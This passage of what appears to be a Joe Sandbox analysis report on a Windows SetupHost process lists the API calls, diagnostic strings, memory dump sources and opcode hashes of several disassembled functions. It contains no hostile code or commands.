                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 009ED55C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 009ED56F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009ED5A5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 009ED5B8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009ED5BF
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009ED5D2
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009ED5E0
                                                                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 009ED61A
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009ED632
                                                                                                                                                                                                                  • Part of subcall function 009ECEB0: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,009E8B82), ref: 009ECECB
                                                                                                                                                                                                                  • Part of subcall function 009ECEB0: LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,009E8B82), ref: 009ECEE2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Last$Heap$Process$AllocCriticalSectionStatus$CloseEnterFreeHandleLeave
                                                                                                                                                                                                                • String ID: AddCaptureNodeToImage$GetMetadataPadding
                                                                                                                                                                                                                • API String ID: 1694025836-3639775197
                                                                                                                                                                                                                • Opcode ID: 9ecdd2381bbcb8b189056f1f9db1b95c8ac2053b8d2377b9c55e25cbf94acbca
                                                                                                                                                                                                                • Instruction ID: 53ff52f72dac2afe64d539e7dcff7dbdc32dc8e206f2cd75f343c6a62ff0e4a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ecdd2381bbcb8b189056f1f9db1b95c8ac2053b8d2377b9c55e25cbf94acbca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27D1BF71605391ABD716DFA6C844B6BB7E9BFC8314F008A29F955DB2A0DB30ED01CB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE660
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE676
                                                                                                                                                                                                                • _wcsnicmp.MSVCRT ref: 009BE6C3
                                                                                                                                                                                                                • _wcsnicmp.MSVCRT ref: 009BE6DB
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE769
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE77F
                                                                                                                                                                                                                • _wcsnicmp.MSVCRT ref: 009BE7AA
                                                                                                                                                                                                                • _wcsnicmp.MSVCRT ref: 009BE7C3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE7E7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BE7EE
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE7F8
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE804
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$_wcsnicmp$Heap$FreeProcess
                                                                                                                                                                                                                • String ID: ?$\$\\?\UNC
                                                                                                                                                                                                                • API String ID: 147870345-2838641066
                                                                                                                                                                                                                • Opcode ID: e9342422319f8cde0e7a6beda33bb446a82a0e36e5d8dc327b5095250a2e73e4
                                                                                                                                                                                                                • Instruction ID: 213d294802e803d65f260552f2d8125f1c9a9ede524bbe9116defa7242abbb2e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9342422319f8cde0e7a6beda33bb446a82a0e36e5d8dc327b5095250a2e73e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7551B376D002299BDB11CBA58A88BFE77FDAF84760F158529ED11EB240EB34DD0187A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00A075DB
                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00A075F3
                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00A07622
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A07652
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A07659
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A07664
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A0766B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A07676
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A0767D
                                                                                                                                                                                                                  • Part of subcall function 00A072B3: __EH_prolog3.LIBCMT ref: 00A072BA
                                                                                                                                                                                                                  • Part of subcall function 00A072B3: GetProcessHeap.KERNEL32(00000000,0000001C,00000008,00A076A8), ref: 00A072C4
                                                                                                                                                                                                                  • Part of subcall function 00A072B3: HeapAlloc.KERNEL32(00000000), ref: 00A072CB
                                                                                                                                                                                                                • wcstok_s.MSVCRT ref: 00A076C6
                                                                                                                                                                                                                • swscanf_s.MSVCRT ref: 00A07700
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess$_wcsicmp$H_prolog3swscanf_swcstok_s
                                                                                                                                                                                                                • String ID: %s %s "%[^"]"$LOG$SUPPRESS$default
                                                                                                                                                                                                                • API String ID: 515261758-364000695
                                                                                                                                                                                                                • Opcode ID: 2162a94ea02b8cb85d8f9f3698a003cc2c8c89b0308ee13c6a676e2a257447cc
                                                                                                                                                                                                                • Instruction ID: 829db2ae14df4c7fc29339272885f28a03194544613135b50e03fc1902873afd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2162a94ea02b8cb85d8f9f3698a003cc2c8c89b0308ee13c6a676e2a257447cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39514E75D08219ABCF15DFE9ED449EEBBB9FF48350B14811AE806E3290D770AC01CBA4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001200,00000000,00000001,00000400,?,00000100,00000000,00000000,?,?), ref: 00A0B4C7
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32(00000001,?), ref: 00A0B52E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                • API String ID: 2411632146-3173542853
                                                                                                                                                                                                                • Opcode ID: 711e86c90350b5e60d8522e25a80d908d852f6fbf2cc0bf19ca2a860642ce802
                                                                                                                                                                                                                • Instruction ID: f03aa74bf5481a4348f388d1eb7bcea420fcd8a1162aa7efe9873d52aa1d41b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 711e86c90350b5e60d8522e25a80d908d852f6fbf2cc0bf19ca2a860642ce802
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E5137B1921308ABCF346F69AF49E6777B8EF48304F00459DF106965D2D772AA80CB71
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057), ref: 009BE9A0
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE660
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE676
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6C3
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6DB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 009BE8A7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BE8AE
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009BE8BB
                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 009BE8DA
                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 009BE929
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009BE933
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?), ref: 009BE94F
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009BE955
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BE97A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BE981
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009BE989
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009BE992
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CreatePath: Unable to create parent directory for [%s]; GLE = 0x%x, xrefs: 009BE95F
                                                                                                                                                                                                                • CreatePath: Unable to create [%s]; GLE = 0x%x, xrefs: 009BE93F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap$CreateDirectoryFreeProcess_wcsnicmp$wcschr
                                                                                                                                                                                                                • String ID: CreatePath: Unable to create [%s]; GLE = 0x%x$CreatePath: Unable to create parent directory for [%s]; GLE = 0x%x
                                                                                                                                                                                                                • API String ID: 2341681147-3722567961
                                                                                                                                                                                                                • Opcode ID: d7a4df2545eff4021e911eba7441735d81d759d1777b32bbf56a00b04f12ab9f
                                                                                                                                                                                                                • Instruction ID: fa5160a6db77b3ce7c333d549dae9961be1ed12b58206862cbfcc8e239c3ee81
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7a4df2545eff4021e911eba7441735d81d759d1777b32bbf56a00b04f12ab9f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C441E576904315EBDB20EFB49E49AFF77BCEF84B20B148929FC05E6250E6308D428795
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000), ref: 009BD70A
                                                                                                                                                                                                                • CopyFileExW.KERNEL32(?,00000000,00000000,?,00000000,FFFFFFE0), ref: 009BD766
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 009BD77B
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 009BD7C1
                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 009BD7DC
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009BD7E8
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009BD81D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009BD844
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • WdsCopyFileEx: Failed to strip file attributes for %s, will delete. GLE = 0x%x, xrefs: 009BD7F9
                                                                                                                                                                                                                • WdsCopyFileEx: Failed to delete %s. GLE = 0x%x, xrefs: 009BD82C
                                                                                                                                                                                                                • WdsCopyFileEx: Failed to copy [%s] to [%s], GLE = 0x%x; will retry in %u ms, xrefs: 009BD7A5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$File$AttributesCopySleep
                                                                                                                                                                                                                • String ID: WdsCopyFileEx: Failed to copy [%s] to [%s], GLE = 0x%x; will retry in %u ms$WdsCopyFileEx: Failed to delete %s. GLE = 0x%x$WdsCopyFileEx: Failed to strip file attributes for %s, will delete. GLE = 0x%x
                                                                                                                                                                                                                • API String ID: 3311940979-3794789305
                                                                                                                                                                                                                • Opcode ID: 35566b57736e09bd6daaa5e6f3426b951ae5116ab9e6f0a03cf9807f28891b54
                                                                                                                                                                                                                • Instruction ID: 9f7c76c289177b1a56db0ebd32b6d22127770676a375dd5d8c393234a32ddc63
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35566b57736e09bd6daaa5e6f3426b951ae5116ab9e6f0a03cf9807f28891b54
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1341D271A01305ABEB21DFE99E4ABEF3B79AFC4765F048024F905A6190FF70CD019A60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000820,?,00000000,00000000,?,?,?,?,?,?,?,?,?,009E5463,?), ref: 009EC9B5
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,009E5463,?,00000000), ref: 009EC9BC
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,009E5463,?,00000000), ref: 009EC9F5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009ECAFE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009ECB05
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009ECB1B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009ECB22
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009ECB32
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009ECB39
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009ECB46
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009ECB4D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009ECB54
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$ErrorLast$Alloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 646459838-0
                                                                                                                                                                                                                • Opcode ID: d668b07c0bf10bdbb9141eeac41d8e6e4cebf6ae6d36ec24d7b0114f639304b6
                                                                                                                                                                                                                • Instruction ID: d2e1281112e65a507d3b22fefb8deffee62531b8bdc255e8d88b907ce409e19c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d668b07c0bf10bdbb9141eeac41d8e6e4cebf6ae6d36ec24d7b0114f639304b6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A51D4B1A4438AABDB12DBFADC49BBE76B8BB48741F044525F541F6290DA70DC028B61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009CC765
                                                                                                                                                                                                                • RtlRaiseStatus.NTDLL(C00000E5,?,00000000,00000000), ref: 009CCA7C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: RaiseStatusmemcpy
                                                                                                                                                                                                                • String ID: $(Params->InputType == Windows::Microdom::Rtl::CreateMicrodomSource::Binary) || (Params->InputType == Windows::Microdom::Rtl::CreateMicrodomSource::Xml)$(Params->SourceType == Windows::Microdom::Rtl::CreateMicrodomSource::Stream) || (Params->SourceType == Windows::Microdom::Rtl::CreateMicrodomSource::BlobProvider) || (Params->SourceType == Windows::Microdom::Rtl::CreateMicrodomSource::Blob)$Not-null check failed: Params$Not-null check failed: Params->Source.pBlob$Not-null check failed: Params->Source.pIStream$Params->fRequireUtf8$RtlCreateMicrodom$RtlXmlDetermineStreamEncoding(&TokenizerState, &EncodingLength)$RtlXmlInitializeTokenization(&TokenizerState, &TokenizerInit)$onecore\base\xml\udom_microdom.cpp
                                                                                                                                                                                                                • API String ID: 3199476626-1438151576
                                                                                                                                                                                                                • Opcode ID: 03c1fa5e6b1af656147fbf88464cebc1b6f2e697941594769722fb575a961be8
                                                                                                                                                                                                                • Instruction ID: 6c1ca7888b31f23b5c0c195a66b2eeae35f3c499d3949b312d539e86bef6a9ca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03c1fa5e6b1af656147fbf88464cebc1b6f2e697941594769722fb575a961be8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE0227B0E00759DBDF25CF99C888BEDBBB5AB48304F108499D5097B250DBB46E89CF52
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(00A16EBC,02000000,00000000,00000000), ref: 00A04837
                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000018), ref: 00A0485F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A04874
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A0489C
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A048B0
                                                                                                                                                                                                                • toupper.MSVCRT ref: 00A0498E
                                                                                                                                                                                                                • EventRegister.ADVAPI32(1D1727A6,00000000,00000000,?,?,?,?), ref: 00A049C7
                                                                                                                                                                                                                • EventProviderEnabled.ADVAPI32(?,?,00000000,00000000,00000000,1D1727A6,00000000,00000000,?,?,?,?), ref: 00A049DF
                                                                                                                                                                                                                • EventUnregister.ADVAPI32(?,?,?,?,?), ref: 00A04A00
                                                                                                                                                                                                                • EventUnregister.ADVAPI32(00000000,00000000,?,?,?), ref: 00A04A2C
                                                                                                                                                                                                                • EventUnregister.ADVAPI32(00000000,00000000,?,?,?), ref: 00A04B6B
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?), ref: 00A04B88
                                                                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(00A16EBC), ref: 00A04B97
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Event$CountTickUnregister$ExclusiveLock$AcquireAllocEnabledLocalProviderRegisterReleaseSleeptoupper
                                                                                                                                                                                                                • String ID: <unknown>
                                                                                                                                                                                                                • API String ID: 758907732-1574992787
                                                                                                                                                                                                                • Opcode ID: 0696090704e00a93f619c7bad78469feae5ec91d709d6797d8e637da9aa20721
                                                                                                                                                                                                                • Instruction ID: 4f7d6ec36968bf6ce90ee74e7bf1aa6935c51ac59ab580f00095136a6d3db255
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0696090704e00a93f619c7bad78469feae5ec91d709d6797d8e637da9aa20721
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BA10CB590021C9FCB21DFA4ED84BDAB7F9FB49341F0085AAE649A7250D7709E89CF50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,009DDF5C,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E064C
                                                                                                                                                                                                                  • Part of subcall function 009E07E3: wcsncmp.MSVCRT(00000000,\\?\,00000004,009E0688,?,00000000,00000000,00000000,?,009E5590), ref: 009E07EB
                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,009DDF5C,00000000,00000000,00000000,?,00000000,00000000,009DE358), ref: 009E053D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A10D5A,000000FF), ref: 009E056E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A10D5A,000000FF), ref: 009E0575
                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,-00000003,00000000,?), ref: 009E05AE
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A10D5A,000000FF), ref: 009E05CD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A10D5A,000000FF), ref: 009E05D7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E05DE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00A10D5A,000000FF), ref: 009E05EF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E05F6
                                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 009E061A
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,009DDF5C,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E0633
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E0640
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLast$Process$FreeFullNamePath$Allocwcsncmpwcsrchr
                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                • API String ID: 234323988-4282027825
                                                                                                                                                                                                                • Opcode ID: 55de3472fe881ccf0fea5f2f83f93e3014de598ee4207b875cc9eb8e8fcf0f86
